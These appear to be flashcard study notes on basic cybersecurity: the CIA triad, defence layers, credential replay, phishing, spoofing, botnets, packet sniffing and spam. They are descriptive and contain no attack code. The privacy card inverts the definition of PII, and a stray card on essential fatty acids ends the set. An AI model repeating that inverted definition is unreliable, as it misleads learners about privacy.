• Changes to your browser homepage/start page. • Ending up on a strange site when conducting a search. • System-based firewall is turned off automatically. • Lots of network activity while not particularly active. • Excessive pop-up windows. • New icons, programs, favorites which you did not add. • Frequent firewall alerts about unknown programs when trying to access the Internet. • Poor system performance.
Security Objectives: CIA Triad
• Confidentiality (or secrecy) - Unauthorized users cannot read information - Ensuring information is disclosed to, and reviewed exclusively by, intended recipients / authorized individuals - Authenticity of the user. • Integrity - Ensuring the accuracy and completeness of information and processing methods - Unauthorized users cannot alter/tamper with information • Availability - Authorized users can always access their computing assets (information and functions) - Ensuring that information and associated assets are accessible, whenever necessary, by authorized individuals
Defense and control: Non-IT Related Countermeasures
• Countermeasures can be non-IT related - Physical security of buildings and computers - Screening of personnel - Legal framework to deter criminals - Training employees.
How does Call forwarding happen?
• Cybercriminals scam the phone company into forwarding phone calls. • They may also use scanners, eavesdrop, clone our client's phone identity, and sell bogus ringtones or other gadgets to access our client's phone.
Attack on Availability
• Destroy hardware (cutting fiber) or software • Modify software in a subtle way • Corrupt packets in transit • Blatant denial of service (DoS): - Crashing the server - Overwhelm the server (use up its resource)
Defense and control : Example Security Technologies (mechanisms/countermeasures)
• Encryption - To ensure confidentiality and integrity - To ensure secure communication and storage. • Access control - To withstand threats related to misbehaving users - Role-based access control (RBAC) - Attribute-based access control (ABAC), etc. • Language-based security - To defeat threats related to misbehaving programs • Memory-safety • Sandboxing - Java, .NET/C#
Computer Defense Today
• Encryption • Multiple controls: - System Perimeter: Defines "inside/outside" - Preemption: Attacker scared away - Deterrence: Attacker could not overcome defenses - Faux Environment (e.g. honeypot, sandbox): attack deflected towards a worthless target (but the attacker doesn't know about it!) - Layered Defense * Multilevel defense * Defense in depth (ideal!): a concept in which multiple layers of security controls are placed throughout for redundancy • Software controls • Hardware controls • Policies and procedures • Physical controls.
How does Credential Replay happen?
• If the cybercriminal is not stealing these credentials themselves, they can easily purchase large numbers of stolen login credentials from the dark web. • These large volumes of credentials typically come from data breaches (e.g. Yahoo, Verizon, LinkedIn, etc.).
What is Credential Replay
• Most people re-use passwords and usernames (aka 'credentials'). • Cybercriminals obtain these login credentials, test them in large numbers against financial institutions' websites to find matches, and then request fraudulent fund transfers. • Alternatively, they may resell this information to other cybercriminals to make a profit. • Those cybercriminals may then use this information to commit fraud.
How does Social engineering happen?
• Often cybercriminals contact victims by phone, email, or through social media.
Methods of Defense
• Prevention - Measures to stop breaches of security goals - Prevent attackers from violating security policy • Detection - Measures to detect breaches of security goals - Detect attackers' violation of security policy • Deter attack - Make attack harder (can't make it impossible!) • Deflect attack - Make another target more attractive than this target • Reaction - Measures to recover assets, repair damage, and prosecute (and deter) offenders - Continue to function correctly even if attack succeeds • Good prevention does not make detection & reaction redundant - Breaking into any house with windows is made impossible - Despite this prevention, detection (CCTV) & reaction (alarm) still deter burglars.
Public vs. privacy
• Public - Already a matter of public record or knowledge - Freely distributed and accessible by anyone. • Privacy - Personal information (often called PII - personally identifiable information) - Information that can NOT be used on its own or with other information to identify, contact, or locate an individual, or to identify an individual in context. - Privacy is strongly related to confidentiality, but these two are not the same. - Identity information, financial records, healthcare records, etc. - Internal plans and other operating information that should not be made public
security evaluation
• Security Capability Maturity Model • The Orange Book • Common Criteria Standard • NICE • The Rainbow Series
What is NOT a Security Issue
• Software may crash • Networks may go down • Hardware components may fail • Human operators may make mistakes • Any failures not attributed to some deliberate human action • Accidental failures would count as a reliability issue • Operating mistakes might be a usability issue • Security is concerned with intentional failures • It is a people problem; it cannot be solved by technology alone.
Spam
• Spamming is the abuse of electronic messaging systems to send unsolicited, undesired bulk messages • Spam media includes: • e-mail spam (most widely recognized form) • Instant messaging spam • Usenet newsgroup spam • Web search engine spam • Spam in blogs • Mobile phone messaging spam
Stakeholders • Assets • Stakeholders own assets • Threats to assets • Attack to assets • Mechanisms/Countermeasures • Vulnerability
• Stakeholders - owners, individual, companies,... • Assets - data, functionality, service, software,... • Stakeholders own assets - medical data is owned by patient • Threats to assets - intention to erase, steal, modify,... • Attack to assets - already erased, stolen, modified,... • Attackers who pose threats or launched attacks to assets - employees, clients, script kiddies, criminals, anyone,... • Mechanisms/Countermeasures to protect assets - encryption, password,... • Vulnerability is the weakness in the mechanisms/countermeasures - weak password,...
Integrity Attack - Tampering With Messages
• Stop the flow of the message • Delay and optionally modify the message • Release the message again
What's the impact of Social engineering?
• The criminal commits fraud, steals our client's money, and then they disappear.
How does phishing happen?
• The cybercriminal masquerades as a legitimate source (e.g., financial institution employee, client, banker) • You believe the request is from a trusted source and you unwittingly oblige when they ask you for your personal information.
How does Spoofing happen?
• There are easy tools available to cybercriminals that help to mask the source/sender. • For example, the cybercriminal can create an email address nearly identical to our client's email address (i.e., off by a character), so that, at-a-glance, the email address appears legitimate. • The cybercriminal is relying on our lack of attention to detail in order to commit the fraud.
Purpose of Botnets
• These botnet attacks might be sending spam emails, or flooding a website with so many requests for content that the server cannot cope, which is known as a denial-of-service attack. • A single piece of malware can cause enormous damage, but when thousands, or even millions, of computers run the same program, their effects can be devastating. - The effects of a coordinated attack can mean websites struggle to remain online while the botnet targets their computers. • There are also a number of harmless botnets used for such purposes as the Internet Relay Chat (IRC) text messaging program, but the vast majority are created by malware.
Eavesdropping - Message Interception (Attack on Confidentiality)
• Unauthorized access to information • Illicit copying of files and programs • Packet sniffers and wire tappers - A packet analyzer (also known as a packet sniffer) is an application that can intercept and log traffic that passes over a network. - Packet sniffing is the process of intercepting and logging traffic. - As data streams flow across the network, the sniffer captures each packet - The sniffer decodes the packet's raw data, finding the values of various fields in the packet - The sniffer also analyzes the data content of the packet to understand the values of the information. - This can be done with a specific objective or without any objective.
Unsaturated Fatty acids: Essential Fatty acids (EFA)
• Definition of an essential nutrient: - Cannot be synthesized in sufficient amounts to support normal growth or life - It or a derivative of it must have some essential biological function. • Essential fatty acids are essential because: - Animals cannot insert the double bonds in the right location - EFA are metabolized to a group of compounds called eicosanoids that have essential biological functions. - EFA are also important in cell membrane structure as part of phospholipids